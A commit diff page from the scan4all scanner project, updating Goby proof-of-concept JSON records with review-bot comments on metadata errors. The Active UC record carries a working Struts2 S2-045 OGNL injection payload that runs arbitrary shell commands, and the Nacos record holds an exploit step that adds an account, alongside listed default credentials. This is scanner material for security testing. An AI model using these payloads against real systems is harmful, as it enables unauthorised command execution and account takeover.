Projects STRLCPY scan4all Commits a0bb6248
Showing first 200 files as there are too many
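--- a/lib/goby/goby_pocs/360_TianQing_ccid_SQL_injectable.json
+++ b/lib/goby/goby_pocs/360_TianQing_ccid_SQL_injectable.json
@@ -1,23 +1,17 @@
 {
  "Name": "360 TianQing ccid SQL injectable",
  "Level": "2",
- "Tags": [
- "sqli"
- ],
+ "Tags": [],
  "GobyQuery": "app=\"360-TianQing\"",
- "Description": "",
+ "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
  "Product": "360 TianQing",
- "Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
- "Author": "",
- "Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.",
- "Recommendation": "update",
- "References": [],
- "HasExp": true,
- "ExpParams": null,
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "Homepage": "htp://360.cn",
+ "Author": "PeiQi",
+ "Impact": "<p>The attacker can get the server permission by injecting SQL into the upload Trojan<br></p>",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -25,7 +19,7 @@
  "method": "GET",
  "uri": "/api/dp/rptsvcsyncpoint?ccid=1",
  "follow_redirect": true,
- "header": null,
+ "header": {},
  "data_type": "text",
  "data": ""
  },
@@ -66,43 +60,6 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-04-09 08:51:50",
+ "GobyVersion": "1.8.255"
 }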
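Review bot: The new side renames the remediation key to `"Recommandation"` (new line 11), so a consumer that reads `Recommendation` would find no remediation text for this finding; the key should stay `"Recommendation": "update"`. The same misspelt key is introduced in 360_Tianqing_database_information_disclosure.json, Active_UC_index.action_RCE.json, both Alibaba_Nacos files and both Apache_Kylin files, while Apache_Airflow_Unauthorized.json keeps the original spelling, so the corpus ends up with two keys for one field. In this file the homepage is also malformed (`"Homepage": "htp://360.cn"`) and the `sqli` tag is dropped (`"Tags": []`), which removes the only classification a triage filter could use. Whether the loader accepts either spelling is not visible from this page.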
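--- a/lib/goby/goby_pocs/360_Tianqing_database_information_disclosure.json
+++ b/lib/goby/goby_pocs/360_Tianqing_database_information_disclosure.json
@@ -1,23 +1,19 @@
 {
- "Name": "360 TianQing database information disclosure",
+ "Name": "360 Tianqing database information disclosure",
  "Level": "0",
  "Tags": [
  "Disclosure of Sensitive Information"
  ],
  "GobyQuery": "app=\"360-TianQing\"",
- "Description": "",
- "Product": "360 TianQing",
- "Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
- "Author": "",
- "Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
- "Recommendation": "update",
- "References": [],
- "HasExp": true,
- "ExpParams": null,
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information",
+ "Product": "360 Tianqing",
+ "Homepage": "https://www.360.cn/",
+ "Author": "PeiQi",
+ "Impact": "",
+ "Recommandation": "<p>undefined</p>",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -25,7 +21,7 @@
  "method": "GET",
  "uri": "/api/dbstat/gettablessize",
  "follow_redirect": false,
- "header": null,
+ "header": {},
  "data_type": "text",
  "data": ""
  },
@@ -66,43 +62,6 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-04-08 16:04:28",
+ "GobyVersion": "1.8.255"
 }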
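Review bot: The remediation field on the new side holds the literal string `<p>undefined</p>` (new line 13), which looks like an unset editor value serialised into the record, so a report generated from it would show "undefined" as the fix. `"Impact"` is emptied while its text moves to `"Description"` with the repeated word intact ("unauthorized unauthorized unauthorized"). I would restore `"Recommendation": "update"` or write a real remediation, and deduplicate the description. Apache_Kylin_Console_Default_password.json carries the same `<p>undefined</p>` value.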
  • lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE-2021-40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE_2021_40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/AVCON6_org_execl_download.action_file_down.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
    lib/goby/goby_pocs/Active_UC_index.action_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    1 1  {
    2  - "Name": "Active UC index.action RCE",
     2 + "Name": "Active UC index.action ",
    3 3   "Level": "3",
    4 4   "Tags": [
    5 5   "RCE"
    6 6   ],
    7 7   "GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
    8  - "Description": "",
    9  - "Product": "Active UC",
    10  - "Homepage": "http://www.iactive.com.cn/",
    11  - "Author": "",
    12  - "Impact": "Active UC index.action has a RCE vulnerability.",
    13  - "Recommendation": "update",
    14  - "References": [],
    15  - "HasExp": true,
    16  - "ExpParams": [
    17  - {
    18  - "Name": "cmd",
    19  - "Type": "input",
    20  - "Value": "whoami"
    21  - }
     8 + "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
     9 + "Product": "(Active UC)",
     10 + "Homepage": "https://gobies.org/",
     11 + "Author": "luckying",
     12 + "Impact": "",
     13 + "Recommandation": "",
     14 + "References": [
     15 + "https://gobies.org/"
    22 16   ],
    23  - "ExpTips": {
    24  - "Type": "",
    25  - "Content": ""
    26  - },
     17 + "HasExp": true,
     18 + "ExpParams": [
     19 + {
     20 + "name": "Cmd",
     21 + "type": "input",
     22 + "value": "whoami",
     23 + "show": ""
     24 + }
     25 + ],
    27 26   "ScanSteps": [
    28 27   "AND",
    29 28   {
    skipped 12 lines
    42 41   "Pragma": "no-cache"
    43 42   },
    44 43   "data_type": "text",
    45  - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
     44 + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
    46 45   },
    47 46   "ResponseTest": {
    48 47   "type": "group",
    skipped 11 lines
    60 59   "SetVariable": []
    61 60   }
    62 61   ],
    63  - "ExploitSteps": [
     62 + "ExploitSteps": [
    64 63   "AND",
    65 64   {
    66 65   "Request": {
    skipped 6 lines
    73 72   "Connection": "close",
    74 73   "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
    75 74   "Charsert": "UTF-8",
    76  - "Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
     75 + "Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
    77 76   "Cache-Control": "no-cache",
    78 77   "Pragma": "no-cache"
    79 78   },
    80 79   "data_type": "text",
    81  - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
     80 + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
    82 81   },
    83 82   "ResponseTest": {
    84 83   "type": "group",
    skipped 9 lines
    94 93   ]
    95 94   },
    96 95   "SetVariable": [
    97  - "output|lastbody|undefined|undefined"
    98  - ]
     96 + "output|lastbody"
     97 + ]
    99 98   }
    100 99   ],
    101  - "PostTime": "0000-00-00 00:00:00",
    102  - "GobyVersion": "0.0.0"
     100 + "PostTime": "2021-06-28 10:08:54",
     101 + "GobyVersion": "1.8.268"
    103 102  }
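Review bot: The new `"Description"` attributes the issue to S2-045, but `"References"` points only to `https://gobies.org/` and `"Impact"` is empty, so someone triaging a hit has no advisory or fixed version to map it to; a link to the vendor or Struts advisory for S2-045 belongs in `"References"`. The new `"Name": "Active UC index.action "` also loses the `RCE` suffix and ends in a trailing space, which no longer matches the file name and would defeat any name-based allow or suppression list. `"Product"` changes from `Active UC` to `(Active UC)`, so findings for the same product will group under two different labels.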
  • lib/goby/goby_pocs/Adobe_ColdFusion_LFI_CVE-2010-2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Alibaba Nacos 控制台默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Alibaba Nacos 未授权访问漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
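--- a/lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json
+++ b/lib/goby/goby_pocs/Alibaba_Nacos_Add_user_not_authorized.json
@@ -2,38 +2,39 @@
  "Name": "Alibaba Nacos Add user not authorized",
  "Level": "2",
  "Tags": [
- "unauthorized"
+ "Ultra vires"
  ],
- "GobyQuery": "title=\"Nacos\"",
- "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
+ "GobyQuery": "title==\"Nacos\"",
+ "Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
  "Product": "Alibaba Nacos",
  "Homepage": "https://github.com/alibaba/nacos",
- "Author": "",
- "Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
- "Recommendation": "update",
- "References": [],
+ "Author": "PeiQi",
+ "Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
+ "Recommandation": "<p>Upgrade version<br></p>",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
  "HasExp": true,
- "ExpParams": [
- {
- "Name": "User",
- "Type": "input",
- "Value": "test"
- },
- {
- "Name": "Pass",
- "Type": "input",
- "Value": "test"
- },
- {
- "Name": "Dir",
- "Type": "select",
- "Value": "/v1/auth/users,/nacos/v1/auth/users"
- }
- ],
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "ExpParams": [
+ {
+ "name": "User",
+ "type": "input",
+ "value": "PeiQi",
+ "show": ""
+ },
+ {
+ "name": "Pass",
+ "type": "input",
+ "value": "PeiQi",
+ "show": ""
+ },
+ {
+ "name": "Dir",
+ "type": "select",
+ "value": "/v1/auth/users,/nacos/v1/auth/users",
+ "show": ""
+ }
+ ],
  "ScanSteps": [
  "OR",
  {
@@ -89,7 +90,7 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
+ "ExploitSteps": [
  "AND",
  {
  "Request": {
@@ -102,7 +103,7 @@
  "data_type": "text",
  "data": "username={{{User}}}&password={{{Pass}}}"
  },
- "ResponseTest": {
+ "ResponseTest": {
  "type": "group",
  "operation": "AND",
  "checks": [
@@ -116,10 +117,10 @@
  ]
  },
  "SetVariable": [
- "output|lastbody|undefined|undefined"
- ]
+ "output|lastbody"
+ ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-04-04 19:56:49",
+ "GobyVersion": "1.8.255"
 }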
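Review bot: The default `"value"` of the `User` and `Pass` parameters is now the fixed string `PeiQi` (new lines 22 and 28), and the exploit step posts them as `username={{{User}}}&password={{{Pass}}}`; going by the description this creates an account, so any run left at the defaults would leave a publicly known credential pair on the tested system. The record should state in `"Description"` that the step is state-changing and needs cleanup, and the defaults are better left empty so the operator has to choose them. `"Tags"` also changes from `unauthorized` to `Ultra vires`, which matches no other tag on this page (Apache_Airflow_Unauthorized.json uses `Unauthorized`). `"GobyQuery"` moves from `title=` to `title==`, presumably an exact-title match; confirm the narrower match is intended, since an inventory query that misses instances with a customised title under-reports exposure.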
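--- a/lib/goby/goby_pocs/Alibaba_Nacos_Default_password.json
+++ b/lib/goby/goby_pocs/Alibaba_Nacos_Default_password.json
@@ -1,23 +1,19 @@
 {
- "Name": "Alibaba Nacos Default Password",
+ "Name": "Alibaba Nacos Default password",
  "Level": "1",
  "Tags": [
- "Default Password"
+ "Default password"
  ],
- "GobyQuery": "title=\"Nacos\"",
- "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
+ "GobyQuery": "title==\"Nacos\"",
+ "Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)",
  "Product": "Alibaba Nacos",
  "Homepage": "https://github.com/alibaba/nacos",
- "Author": "",
- "Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).",
- "Recommendation": "",
- "References": [],
- "HasExp": true,
- "ExpParams": null,
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "Author": "PeiQi",
+ "Impact": "<p>Log in to the background to view sensitive information<br></p>",
+ "Recommandation": "<p>Upgrade version</p>",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
  "ScanSteps": [
  "OR",
  {
@@ -75,43 +71,6 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-04-04 18:56:41",
+ "GobyVersion": "1.8.255"
 }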
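Review bot: The remediation on the new side is `<p>Upgrade version</p>` (new line 13), but the finding is a default credential, which an upgrade does not remove; the text should tell the operator to change the default `nacos` account password and restrict access to the console. The new `"Description"` also carries over the misspelt pair `(nacos/naocs)` from the old `"Impact"` next to "Nacos/Nacos", so a reader cannot tell which credential the check actually tests. Apache_Kylin_Console_Default_password.json has the same gap: a default-password finding whose remediation field gives no instruction to change the password.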
  • lib/goby/goby_pocs/Ametys_CMS_infoleak_CVE_2022_26159.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache ActiveMQ Console控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache Cocoon Xml 注入 CVE-2020-11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache Kylin Console 控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache Kylin 未授权配置泄露 CVE-2020-13937.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache Solr任意文件读取漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_APISIX_Dashboard_API_Unauthorized_Access_CVE-2021-45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_APISIX_Dashboard_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_ActiveMQ_Console_Weak_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_ActiveMQ_default_admin_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
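--- a/lib/goby/goby_pocs/Apache_Airflow_Unauthorized.json
+++ b/lib/goby/goby_pocs/Apache_Airflow_Unauthorized.json
@@ -1,18 +1,18 @@
 {
  "Name": "Apache Airflow Unauthorized",
- "Level": "2",
+ "Level": "3",
  "Tags": [
  "Unauthorized"
  ],
  "GobyQuery": "app=\"APACHE-Airflow\"",
- "Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.",
+ "Description": "remote attacker to gain unauthorized access to a targeted system",
  "Product": "APACHE-Airflow",
  "Homepage": "https://airflow.apache.org/",
- "Author": "",
- "Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.",
- "Recommendation": "Restrict public access and upgrade to the latest version of Airflow.",
+ "Author": "aetkrad",
+ "Impact": "<p>This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs<br></p>",
+ "Recommendation": "",
  "References": [],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -62,43 +62,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-10-31 15:32:53",
+ "GobyVersion": "1.8.302"
 }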
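Review bot: `"Level"` is raised from 2 to 3 while `"Recommendation"` is emptied (new line 13), dropping the earlier guidance "Restrict public access and upgrade to the latest version of Airflow."; a higher-severity finding with no remediation is harder to act on, so I would keep that sentence. The new `"Description"` is a sentence fragment ("remote attacker to gain unauthorized access to a targeted system") and no longer says what the product is. `"References"` stays empty, so the statement in `"Impact"` about unauthenticated changes to Airflow variables has no advisory behind it on this page.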
  • lib/goby/goby_pocs/Apache_Cocoon_XML_Injection_CVE_2020_11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_CouchDB_Remote_Privilege_Escalation_CVE-2017-12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_CouchDB_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE-2021-36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Druid_Arbitrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_2.4.50_Path_Traversal_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_RCE_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE-2021-40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(1).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(2).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
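--- a/lib/goby/goby_pocs/Apache_Kylin_Console_Default_password.json
+++ b/lib/goby/goby_pocs/Apache_Kylin_Console_Default_password.json
@@ -1,23 +1,19 @@
 {
- "Name": "Apache Kylin Console default password",
+ "Name": "Apache Kylin Console Default password",
  "Level": "1",
  "Tags": [
  "Default password"
  ],
  "GobyQuery": "app=\"APACHE-kylin\"",
- "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
+ "Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console",
  "Product": "Apache Kylin",
  "Homepage": "http://kylin.apache.org/",
- "Author": "",
- "Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.",
- "Recommendation": "",
- "References": [],
- "HasExp": true,
- "ExpParams": null,
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "Author": "PeiQi",
+ "Impact": "<p>The attacker will log into the background as an administrator to further attack</p>",
+ "Recommandation": "<p>undefined</p>",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -55,43 +51,6 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-04-04 15:51:21",
+ "GobyVersion": "1.8.255"
 }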
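--- a/lib/goby/goby_pocs/Apache_Kylin_Unauthorized_configuration_disclosure.json
+++ b/lib/goby/goby_pocs/Apache_Kylin_Unauthorized_configuration_disclosure.json
@@ -1,31 +1,28 @@
 {
- "Name": "Apache Kylin API Unauthorized Access CVE-2020-13937",
- "Level": "1",
+ "Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)",
+ "Level": "0",
  "Tags": [
- "unauthorized"
+ "Disclosure of Sensitive Information"
  ],
  "GobyQuery": "app=\"APACHE-kylin\"",
- "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
+ "Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.",
  "Product": "Apache kylin",
  "Homepage": "http://kylin.apache.org/",
- "Author": "",
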